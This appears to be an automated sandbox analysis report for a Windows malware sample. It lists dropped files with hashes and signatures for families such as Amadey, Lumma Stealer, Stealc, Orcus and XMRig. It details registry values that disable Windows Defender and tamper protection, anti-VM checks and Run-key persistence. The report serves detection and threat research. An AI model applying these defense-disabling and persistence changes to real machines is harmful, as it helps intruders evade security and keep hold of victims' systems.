memory/576-859-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bd6e9a94479b4ea452d0edf52753320f
SHA1 ad7f248fc4ca2b75459337487682e0ba648f699e
SHA256 8d8dbaeba7b4b3ad084c6b04d3462aee354b8831a69a3cee1a7c9093c0bd2cbc
SHA512 e1b653f5d106a5bdd44480aa5b6a4ffa6a5aefbb1d96cefc59284396a5a6ef0086c03c7dbd640dc17573335186459112a873226ac18a771a90b550afed4c798f

memory/1260-882-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2876-884-0x0000000000250000-0x0000000000715000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b485d38393f9a81a301b449de5a18572
SHA1 c30a91d549c45bdca336af128bffe8a2446d3306
SHA256 97e169acb2588cb5f43005a326f1b60a27d8745bab2ad5364db484fd767ef3e4
SHA512 99000d29eabbdc898e0be4c718acb9284e7ed3c605b1331bb66104b091ec661a410a5a7ef5536dc73bfe5917b25e28d6961c746375e69aba393f8bccac058748

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 7b1434f5ef9f54f8faec169cdf97fc30
SHA1 43b9484471778aca32df678505f4437d8239a663
SHA256 a61ae9e623f7b243e3868d090f2e994f75392a2315523f21ace2d35de982413f
SHA512 f551e50825f779814e7e0475943781d18a830d4ca8bda659f5fbbce4203d00076c4bf2976a505b4a3d47adf0083c3e8765246dd9b825c535f9dc899c6025c107

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

memory/3660-937-0x0000000001080000-0x00000000010AE000-memory.dmp

memory/576-954-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 486d13a0e7ac39122e1525ffe19f3b8f
SHA1 9400c10ae11b0fe96773ddf56a0fbf0d36850e10
SHA256 e77c6d41e2f3886c040bbd02eee12b4d3ecd7f51a4aad0634feda0be03598c49
SHA512 13367912713eea63ccb23040c92b990714d7acb8897d8547e3a1bfbe9f9bc8344c75abd168e458f35e293d20d9a80cd2e18c717e9f17d86b92137ead96ed6664

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs-1.js

MD5 37b999203e40621bf969a40e7615bd93
SHA1 a4e566ea3fa1ae61917f8a90694affbeabcd499b
SHA256 40349227b8bf7e810faace7d8a4013d5e6104ca919ac1dfe36625d49767faf11
SHA512 205744f89a049d0b86580e906b94587630812e5a19fd495c727462f9fc965425e56469c552fa745af4a12493fae504d4891f38ab0eb9cbbb50f517173b1caf33

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 02:29

Reported

2024-12-06 02:32

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5064 created 3412 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\Explorer.EXE

TA505

ta505

Ta505 family

ta505

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32dac93b2c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\32dac93b2c.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dc0bfa7b6f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\dc0bfa7b6f.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\35d9f5c14a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\35d9f5c14a.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a99fc41bfc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\a99fc41bfc.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
